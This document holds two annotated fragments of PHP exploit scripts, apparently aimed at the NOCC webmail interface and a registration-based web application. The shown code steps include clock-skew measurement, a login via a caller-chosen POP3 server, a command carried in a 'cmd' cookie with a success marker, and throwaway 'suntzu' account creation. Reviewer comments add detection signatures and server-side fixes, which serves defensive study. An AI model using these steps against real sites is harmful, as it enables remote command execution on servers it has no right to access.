// NOTE(review): excerpt of a longer script, collapsed onto one line by the page; it ends
// part-way through building the login request. Identifier case (tArGeT, hOsT, pAcKeT, ...)
// is kept as the page renders it.
//
// Synchronize with the remote target's Unix epoch time using the Apache "Date:" response header.
// It carries GMT time... sending two HEAD requests, one to the target, one to yourself.
// NOTE(review): the reason for measuring the skew is not visible in this excerpt; presumably a
// later step depends on a value the target derives from its clock (confirm). If so, the
// server-side fix is to derive such names or tokens from random_bytes() rather than from time,
// since any client can read the server clock from the Date header.
// NOTE(review): eregi() was removed in PHP 7.0, which dates this script to PHP 5-era tooling.
// $HtMl is tested before this block sends anything; presumably sendpAcKeTii() stores each
// response in $HtMl as a side effect, so the test runs on an earlier response (confirm).
if (eregi("Date: ", $HtMl)) {
    // First HEAD request: goes to the target, only to obtain its Date header.
    $pAcKeT = "HEAD / HTTP/1.1\r\nhOsT: " . $hOsT . "\r\nConnection: Close\r\n\r\n";
    sendpAcKeTii($pAcKeT);
    $itstime = greenwich_timestamp($HtMl);
    echo "tArGeT hOsT greenwich timestamp: " . $itstime . "<br>";
    // Second HEAD request: the same packet with the host swapped for the web server this
    // script itself runs on, read over a raw socket to obtain the local Date header.
    $pAcKeT = str_replace($hOsT, $_SERVER[SERVER_NAME], $pAcKeT);
    $fp = fsockopen($_SERVER[SERVER_NAME], $_SERVER[SERVER_PORT]);
    fputs($fp, $pAcKeT);
    $out = '';
    while (!feof($fp)) {
        $out .= fgets($fp);
    }
    fclose($fp);
    $mytime = greenwich_timestamp($out);
    echo "my greenwich timestamp: " . $mytime . "<br>";
    // Skew = target clock minus local clock; the unit depends on greenwich_timestamp(),
    // which is defined outside this excerpt (presumably seconds; confirm).
    $difftime = $itstime - $mytime;
    echo "difftime: " . $difftime . "<br>";
}
#STEP 1 -> Login to a POP3 server that you choose to have access on NOCC interface
// The form body below asks the webmail front end to open a POP3 session (port 110) against
// the host in $POP3_SERVER, which the caller selects.
// Defender view: a POST to <path>action.php with servtype=pop3 and a server= value outside the
// mail hosts the deployment is meant to serve is the observable for this step (visible at a WAF
// or with request-body logging). Pinning the front end to a fixed list of mail servers removes
// the ability to obtain a session through a client-controlled host.
// NOTE(review): the next line is not valid PHP as shown; the ****** looks like a redaction
// applied by the hosting page to the original expression. Left as found.
$dAtA = "user="******"&domainnum=0";
$dAtA .= "&passwd=" . $PASSWD;
$dAtA .= "&server=" . $POP3_SERVER;
$dAtA .= "&port=110";
$dAtA .= "&servtype=pop3";
$dAtA .= "&lang=en";
$dAtA .= "&theme=standard";
$dAtA .= "&enter=Ok";
// Request line only; $p is presumably the application's base path (confirm). The headers and
// the send are outside this excerpt.
$pAcKeT = "POST " . $p . "action.php HTTP/1.1\r\n";
// NOTE(review): excerpt of a longer script, collapsed onto one line by the page; it starts in
// the middle of a request being assembled and ends part-way through the registration form body.
//
// Last two headers of a request whose beginning is not visible. The value of $cmd travels in a
// cookie named "cmd".
// Defender view: a Cookie header named cmd that carries command-like text rather than a session
// identifier is the observable here; cookie values are often absent from default access logs,
// so this needs header logging or a WAF rule.
$packet .= "Cookie: cmd=" . $cmd . ";\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
// Success test: the literal marker "56789" in the response ($html is presumably filled by
// sendpacketii(); confirm). Everything after the first marker is printed and the script stops.
// The same marker appearing in an outbound response body is a usable egress signature.
if (strstr($html, "56789")) {
    echo "Exploit succeeded...";
    $temp = explode("56789", $html);
    die("\r\n" . $temp[1] . "\r\n");
}
echo "step 0b -> Synchronize...\r\n";
// Default skew, used when no Date header can be read (see the else branch below).
$difftime = 0;
// Unix epoch time by Apache "Date:" response header.
// It carries GMT time... sending HEAD request.
// NOTE(review): the reason for measuring the skew is not visible in this excerpt; presumably a
// later step depends on a value the target derives from its clock (confirm). If so, the
// server-side fix is to derive such names or tokens from random_bytes() rather than from time.
$packet = "HEAD / HTTP/1.1\r\nHost: " . $host . "\r\nConnection: Close\r\n\r\n";
sendpacketii($packet);
// The skew is computed only when a Date header is present and no proxy is configured.
// NOTE(review): eregi() was removed in PHP 7.0, which dates this script to PHP 5-era tooling.
if (eregi("Date: ", $html) and $proxy == '') {
    $itstime = greenwich_timestamp($html);
    echo "target host Greenwich timestamp: " . $itstime . "\r\n";
    // gmtime() is not a PHP built-in; presumably defined elsewhere in the script (confirm).
    $mytime = gmtime();
    echo "my greenwich timestamp: " . $mytime . "\r\n";
    // Skew = target clock minus local clock.
    $difftime = $itstime - $mytime;
    echo "difftime: " . $difftime . "\r\n";
} else {
    echo "Unable to read \"Date\", assuming difftime = 0\r\n";
}
echo "step 1 -> Register...\r\n";
// make_seed() is not a PHP built-in; presumably defined elsewhere in the script (confirm).
srand(make_seed());
$anumber = rand(1, 99999);
// Registration form body for a throwaway account: name "suntzu" followed by a number from
// 1 to 99999, a fixed password, and an address of the form suntzu<number>@fakemail.com
// (%40 is the URL-encoded "@").
// Defender view: these literals are searchable in the user table and in registration logs when
// triaging a host that may have received this traffic.
$data = "name=suntzu" . $anumber;
$data .= "&pass=suntzu";
$data .= "&pass2=suntzu";
$data .= "&email=suntzu" . $anumber . "%40fakemail.com";